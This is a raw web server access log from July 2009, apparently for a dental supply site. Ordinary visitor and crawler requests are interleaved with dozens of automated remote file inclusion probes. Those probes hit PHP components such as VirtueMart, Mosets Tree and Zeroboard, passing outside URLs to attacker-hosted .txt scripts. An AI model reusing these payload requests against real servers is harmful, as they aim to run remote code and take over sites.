114.32.40.221 - - [10/Jul/2009:03:58:11 -0400] "GET /logs/access_log.Q109051300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:03:58:16 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:03:58:21 -0400] "GET /logs/access_log.Q109052200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:59:48 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.celaf.edu.bo/biblioteca/pepek.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.86.17.106 - - [10/Jul/2009:03:59:48 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.celaf.edu.bo/biblioteca/pepek.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [10/Jul/2009:03:59:53 -0400] "GET /logs/access_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 282 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:03:59:53 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:03:59:53 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:03:59:59 -0400] "GET /logs/error_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 281 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
114.32.40.221 - - [10/Jul/2009:04:00:05 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:04:00:06 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include//news.php?REX[INCLUDE_PATH]=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:06 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:06 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:06 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:07 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:07 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:07 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:00:25 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:04:00:26 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:28 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:00:29 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:04:02:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [10/Jul/2009:04:02:36 -0400] "GET /logs/access_log.Q109051700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.150.78.235 - - [10/Jul/2009:04:03:23 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.150.78.235 - - [10/Jul/2009:04:03:23 -0400] "GET //include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.150.78.235 - - [10/Jul/2009:04:03:23 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:03:29 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:03:29 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:03:29 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.150.78.235 - - [10/Jul/2009:04:03:33 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:03:48 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.23.158.226 - - [10/Jul/2009:04:04:03 -0400] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:04:04:03 -0400] "GET /logs/access_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:04:04:03 -0400] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:04:04:08 -0400] "GET /logs/error_log.Q109062000//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
74.6.22.189 - - [10/Jul/2009:04:04:58 -0400] "GET /logs/error_log.Q109062100 HTTP/1.0" 200 2191350 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.109.245.179 - - [10/Jul/2009:04:05:23 -0400] "GET /logs/access_log.Q109052100///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
61.109.245.179 - - [10/Jul/2009:04:05:23 -0400] "GET ///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
61.109.245.179 - - [10/Jul/2009:04:05:23 -0400] "GET /logs///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 8928 "-" "libwww-perl/5.79"
115.76.0.105 - - [10/Jul/2009:04:05:32 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
74.6.22.189 - - [10/Jul/2009:04:05:12 -0400] "GET /logs/error_log.Q109062100 HTTP/1.0" 200 2191350 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.122.184.99 - - [10/Jul/2009:04:06:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:06:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:06:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:06:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:06:22 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:06:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:06:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:06:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
66.178.116.28 - - [10/Jul/2009:04:07:19 -0400] "GET /logs/access_log.Q109051800%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
200.122.184.99 - - [10/Jul/2009:04:07:24 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:07:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:07:27 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:07:27 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
66.178.116.28 - - [10/Jul/2009:04:07:28 -0400] "GET /logs/access_log.Q109061600%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:04:07:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.235 - - [10/Jul/2009:04:07:45 -0400] "GET //include/admin.lib.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.150.78.235 - - [10/Jul/2009:04:07:45 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.150.78.235 - - [10/Jul/2009:04:07:45 -0400] "GET /logs//include/admin.lib.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.150.78.235 - - [10/Jul/2009:04:07:57 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?skin_board_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.122.184.99 - - [10/Jul/2009:04:08:31 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:08:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:08:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:08:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
65.254.32.2 - - [10/Jul/2009:04:08:48 -0400] "GET /logs/access_log.Q109052700%20%20//yabbse/Sources/Packages.php?sourcedir=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:04:08:48 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:04:08:48 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:08:51 -0400] "GET /href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:08:51 -0400] "GET /logs/access_log.Q109052500/href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:08:51 -0400] "GET /logs/href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:08:56 -0400] "GET /logs/access_log.Q109052500/href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:08:56 -0400] "GET /href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:08:56 -0400] "GET /logs/href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:09:03 -0400] "GET /logs/access_log.Q109060700/href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:09:09 -0400] "GET /logs/access_log.Q109060700/href/class=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
84.53.106.224 - - [10/Jul/2009:04:09:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/powertrio.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; nl-nl) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
84.53.106.224 - - [10/Jul/2009:04:09:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/marketingmaterials/powertrio.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; nl-nl) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
66.249.68.70 - - [10/Jul/2009:04:09:37 -0400] "GET /images/items/0032320_thumb.jpg HTTP/1.1" 200 1841 "-" "Googlebot-Image/1.0"
92.48.127.79 - - [10/Jul/2009:04:10:02 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:10:10 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
115.76.0.105 - - [10/Jul/2009:04:10:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
115.76.0.105 - - [10/Jul/2009:04:10:37 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
59.22.140.17 - - [10/Jul/2009:04:10:55 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:10:55 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:10:55 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.6.22.189 - - [10/Jul/2009:04:12:22 -0400] "GET /logs/access_log.Q109020600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [10/Jul/2009:04:12:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.116.30.57 - - [10/Jul/2009:04:12:31 -0400] "GET //lang_main_album.php?phpbb_root_path=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
80.116.30.57 - - [10/Jul/2009:04:12:31 -0400] "GET /logs//lang_main_album.php?phpbb_root_path=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
80.116.30.57 - - [10/Jul/2009:04:12:31 -0400] "GET /logs/access_log.Q109053100//lang_main_album.php?phpbb_root_path=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
80.116.30.57 - - [10/Jul/2009:04:13:27 -0400] "GET /logs/access_log.Q109061600//lang_main_album.php?phpbb_root_path=http://www.erics.altervista.org/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:31 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:31 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:31 -0400] "GET /logs/access_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.122.184.99 - - [10/Jul/2009:04:13:33 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:13:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:13:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:13:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
92.48.127.79 - - [10/Jul/2009:04:13:40 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:40 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:40 -0400] "GET /logs/access_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:43 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:43 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:43 -0400] "GET /logs/access_log.Q109051900%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:44 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:44 -0400] "GET /logs/access_log.Q109051900%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:44 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:53 -0400] "GET /logs/access_log.Q109062800%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:13:55 -0400] "GET /logs/access_log.Q109062800%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:14:12 -0400] "GET //zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:14:12 -0400] "GET /logs/access_log.Q109051200//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:14:12 -0400] "GET /logs//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:14:20 -0400] "GET //zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:14:20 -0400] "GET /logs//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:14:20 -0400] "GET /logs/access_log.Q109051200//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.122.184.99 - - [10/Jul/2009:04:14:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:14:21 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:14:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
200.122.184.99 - - [10/Jul/2009:04:14:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
